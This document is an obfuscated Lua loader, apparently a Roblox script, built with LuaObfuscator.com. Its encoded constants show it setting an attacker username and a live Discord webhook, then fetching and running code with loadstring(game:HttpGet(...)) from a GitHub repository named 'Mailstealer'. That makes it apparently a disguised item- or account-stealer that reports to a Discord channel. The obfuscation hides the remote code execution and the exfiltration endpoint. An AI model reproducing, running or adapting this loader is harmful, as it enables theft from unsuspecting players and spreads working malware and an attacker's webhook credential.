--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v91=v5(v82,v19);v19=nil;return v91;else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=0 -0 ;local v84;while true do if (v83==(0 -0)) then v84=(v31/((3 -1)^(v32-((2 -0) -(1066 -(68 + 997))))))%((621 -(555 + 64))^(((v33-(932 -(857 + 74))) -(v32-1)) + (569 -(367 + 201)))) ;return v84-(v84%(928 -(214 + (1983 -(226 + 1044))))) ;end end else local v85=(0 -0) + 0 ;local v86;while true do if (v85==(0 + 0)) then v86=(879 -(282 + 595))^(v32-(1638 -(1523 + 114))) ;return (((v31%(v86 + v86))>=v86) and (1 + 0)) or 0 ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (119 -(32 + 85)) );v18=v18 + 2 + 0 ;return (v36 * (57 + 199)) + v35 ;end local function v23()local v37=957 -(892 + (258 -193)) ;local v38;local v39;local v40;local v41;while true do if (v37==(2 -1)) then return (v41 * (31011612 -14234396)) + (v40 * (120312 -54776)) + (v39 * (606 -(87 + (1215 -(802 + 150))))) + v38 ;end if (v37==(180 -(67 + 113))) then v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + 3 + 1 ;v37=(2 + 0) -1 ;end end end local function v24()local v42=v23();local v43=v23();local v44=19 -(10 + 8) ;local v45=(v20(v43,2 -1 ,36 -16 ) * (((861 -(814 + 45)) + 0)^(1029 -(915 + 82)))) + v42 ;local v46=v20(v43,59 -38 ,(132 -78) -23 );local v47=((v20(v43,470 -(145 + 293) )==1) and  -(431 -(44 + 21 + 365))) or (1 + 0 + 0) ;if (v46==(0 -0)) then if (v45==(0 + 0)) then return v47 * (1187 -(1069 + (1003 -(261 + 624)))) ;else v46=2 -1 ;v44=1138 -(116 + 1022) ;end elseif (v46==(4477 -2430)) then return ((v45==(0 + 0)) and (v47 * ((1 -0)/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-(1015 + 8) ) * (v44 + (v45/((793 -(368 + 423))^(163 -111)))) ;end local function v25(v48)local v49;if  not v48 then local v87=0 -0 ;while true do if (v87==(1080 -(1020 + (203 -143)))) then v48=v23();if (v48==(1423 -(630 + 793))) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -(4 -3) );v18=v18 + v48 ;local v50={};for v64=1, #v49 do v50[v64]=v2(v1(v3(v49,v64,v64)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;while true do local v66=580 -(361 + 219) ;local v67;while true do if (v66==(0 -0)) then v67=285 -(134 + 151) ;while true do if (v67~=(0 + 0)) then else local v96=1665 -(970 + 695) ;while true do if ((983 -(18 + 964))~=v96) then else v67=3 -2 ;break;end if (v96~=0) then else if ((3 -1)~=v51) then else local v139=0;local v140;while true do if (v139==0) then v140=1990 -(582 + 1408) ;while true do if (v140==(0 + 0)) then local v162=0 -0 ;while true do if (v162==(0 -0)) then for v163=3 -2 ,v23() do local v164=1824 -(1195 + 629) ;local v165;local v166;while true do if (v164==(0 + 0)) then v165=0;v166=nil;v164=127 -(116 + 10) ;end if (v164==(1 -0)) then while true do if (v165~=(738 -(542 + 196))) then else v166=v21();if (v20(v166,1,1 -0 )==(241 -(187 + 54))) then local v175=780 -(162 + 618) ;local v176;local v177;local v178;local v179;while true do if (1~=v175) then else v178=nil;v179=nil;v175=2 + 0 ;end if ((2 + 0)~=v175) then else while true do if (v176==(3 -1)) then local v182=0;while true do if ((0 -0)~=v182) then else if (v20(v178,1 + 0 ,1637 -(1373 + 263) )==(1001 -(451 + 549))) then v179[1 + 1 ]=v57[v179[2 -0 ]];end if (v20(v178,1 + 1 ,2 -0 )~=1) then else v179[3]=v57[v179[7 -4 ]];end v182=1385 -(746 + 638) ;end if (v182==1) then v176=2 + 1 ;break;end end end if (v176~=0) then else local v183=405 -(118 + 287) ;local v184;while true do if (v183~=0) then else v184=0 -0 ;while true do if (v184~=(1121 -(118 + 1003))) then else local v196=0 -0 ;while true do if (v196==(341 -(218 + 123))) then v177=v20(v166,1583 -(1535 + 46) ,3);v178=v20(v166,4 + 0 ,1 + 5 );v196=561 -(306 + 254) ;end if (v196==(1 + 0)) then v184=1;break;end end end if (v184==(1 -0)) then v176=1468 -(899 + 568) ;break;end end break;end end end if (v176~=3) then else if (v20(v178,5 -2 ,3)~=(1 + 0)) then else v179[4 + 0 ]=v57[v179[4]];end v52[v163]=v179;break;end if (1==v176) then v179={v22(),v22(),nil,nil};if (v177==(290 -(60 + 230))) then local v188=572 -(426 + 146) ;while true do if (v188==0) then v179[1 + 2 ]=v22();v179[1460 -(282 + 1174) ]=v22();break;end end elseif (v177==(812 -(569 + 242))) then v179[8 -5 ]=v23();elseif (v177==2) then v179[3]=v23() -(2^(35 -19)) ;elseif (v177==3) then local v198=0 + 0 ;local v199;while true do if (v198==(0 + 0)) then v199=1024 -(706 + 318) ;while true do if ((753 -(239 + 514))==v199) then v179[1254 -(721 + 530) ]=v23() -(2^16) ;v179[1275 -(945 + 326) ]=v22();break;end end break;end end end v176=2;end end break;end if (v175==(0 -0)) then local v180=0 + 0 ;while true do if (v180==(701 -(271 + 429))) then v175=1 + 0 ;break;end if ((0 + 0)==v180) then v176=1500 -(1408 + 92) ;v177=nil;v180=1;end end end end end break;end end break;end end end for v167=1,v23() do v53[v167-(1087 -(461 + 625)) ]=v28();end v162=1;end if (v162==(1289 -(993 + 295))) then v140=1;break;end end end if (v140==1) then return v55;end end break;end end end if (v51==(1202 -(373 + 829))) then local v141=0 + 0 ;while true do if (0==v141) then v52={};v53={};v141=1172 -(418 + 753) ;end if (v141~=2) then else v51=1 + 0 ;break;end if (v141==(1 + 0)) then v54={};v55={v52,v53,nil,v54};v141=1 + 1 ;end end end v96=1;end end end if (v67~=(530 -(406 + 123))) then else if (v51==(337 -(144 + 192))) then local v99=1769 -(1749 + 20) ;while true do if (v99~=(218 -(42 + 174))) then else v51=2 + 0 ;break;end if (v99==(1 + 0)) then local v142=1322 -(1249 + 73) ;while true do if ((0 + 0)==v142) then for v155=1146 -(466 + 679) ,v56 do local v156=0 -0 ;local v157;local v158;local v159;local v160;local v161;while true do if (v156==(2 -1)) then v159=nil;v160=nil;v156=2;end if (v156~=(0 -0)) then else v157=0 + 0 ;v158=nil;v156=1901 -(106 + 1794) ;end if (v156~=(2 + 0)) then else v161=nil;while true do if (v157==(1975 -(1913 + 62))) then v158=0 + 0 ;v159=nil;v157=1 + 0 ;end if (v157==(1 + 0)) then local v169=0 -0 ;while true do if (1==v169) then v157=5 -3 ;break;end if (v169~=0) then else v160=nil;v161=nil;v169=1;end end end if ((7 -5)~=v157) then else while true do if (v158==(114 -(4 + 110))) then local v170=0;while true do if (v170==(584 -(57 + 527))) then local v171=0 + 0 ;while true do if (v171==(1427 -(41 + 1386))) then v159=0;v160=nil;v171=857 -(564 + 292) ;end if (v171~=(104 -(17 + 86))) then else v170=1;break;end end end if ((1 + 0)==v170) then v158=1;break;end end end if (v158==1) then v161=nil;while true do if (v159~=(1 -0)) then else if (v160==(2 -1)) then v161=v21()~=(166 -(122 + 44)) ;elseif (v160==(2 -0)) then v161=v24();elseif (v160~=(8 -5)) then else v161=v25();end v57[v155]=v161;break;end if (v159~=(304 -(244 + 60))) then else local v173=0 -0 ;local v174;while true do if (v173==0) then v174=0 + 0 ;while true do if (0==v174) then local v181=0 + 0 ;while true do if (v181~=(1 -0)) then else v174=66 -(30 + 35) ;break;end if (v181==(0 + 0)) then v160=v21();v161=nil;v181=1;end end end if (v174==(1 + 0)) then v159=1126 -(936 + 189) ;break;end end break;end end end end break;end end break;end end break;end end end v55[1260 -(1043 + 214) ]=v21();v142=1;end if (v142==(1 + 0)) then v99=7 -5 ;break;end end end if (v99==(1212 -(323 + 889))) then v56=v23();v57={};v99=2 -1 ;end end end break;end end break;end end end end local function v29(v58,v59,v60)local v61=v58[1];local v62=v58[2];local v63=v58[3];return function(...)local v68=v61;local v69=v62;local v70=v63;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v88=0,v76 do if (v88>=v70) then v74[v88-v70 ]=v75[v88 + 1 ];else v78[v88]=v75[v88 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=5) then if (v81<=2) then if (v81<=0) then v78[v80[2]]();elseif (v81==1) then v60[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v60[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v72=v80[3];else do return;end end elseif (v81<=3) then local v97=v80[2];v78[v97]=v78[v97](v13(v78,v97 + 1 ,v73));elseif (v81==4) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v60;else v78[v80[2]]=v60[v80[3]];end else local v104;local v105,v106;local v107;local v108;v60[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v60;else v78[v80[2]]=v60[v80[3]];end v72=v72 + 1 ;v80=v68[v72];if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v60;else v78[v80[2]]=v60[v80[3]];end v72=v72 + 1 ;v80=v68[v72];v108=v80[2];v107=v78[v80[3]];v78[v108 + 1 ]=v107;v78[v108]=v107[v80[4]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v108=v80[2];v105,v106=v71(v78[v108](v13(v78,v108 + 1 ,v80[3])));v73=(v106 + v108) -1 ;v104=0;for v134=v108,v73 do local v135=0;while true do if (v135==0) then v104=v104 + 1 ;v78[v134]=v105[v104];break;end end end v72=v72 + 1 ;v80=v68[v72];v108=v80[2];v78[v108]=v78[v108](v13(v78,v108 + 1 ,v73));v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]();v72=v72 + 1 ;v80=v68[v72];v72=v80[3];end elseif (v81<=8) then if (v81<=6) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81==7) then local v119=v80[2];local v120=v78[v80[3]];v78[v119 + 1 ]=v120;v78[v119]=v120[v80[4]];else v60[v80[3]]=v78[v80[2]];end elseif (v81<=10) then if (v81==9) then v78[v80[2]]=v80[3];else local v128=v80[2];local v129,v130=v71(v78[v128](v13(v78,v128 + 1 ,v80[3])));v73=(v130 + v128) -1 ;local v131=0;for v136=v128,v73 do v131=v131 + 1 ;v78[v136]=v129[v131];end end elseif (v81>11) then v72=v80[3];else v78[v80[2]]=v80[3]~=0 ;end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F030D3O004C6F6164696E675363722O656E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4D61696C737465616C657256322F4D61696C737465616C65722F6D61696E2F763203083O00557365726E616D6503063O00626F316D353203073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31393238333936322O3631372O30343038352F476A4E50535F7066676E675767627135676A734A563857452D6C4153307550514852704869516378644137443256596D4641303749555864317477304B754B467376324100163O0012093O00013O0026063O000D0001000200040C3O000D00012O000B000100013O001205000100033O00122O000100043O00122O000200053O00202O00020002000600122O000400076O000200046O00013O00024O00010001000100044O001500010026063O00010001000100040C3O00010001001209000100093O001201000100083O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100012O00023O00017O00",v9(),...);
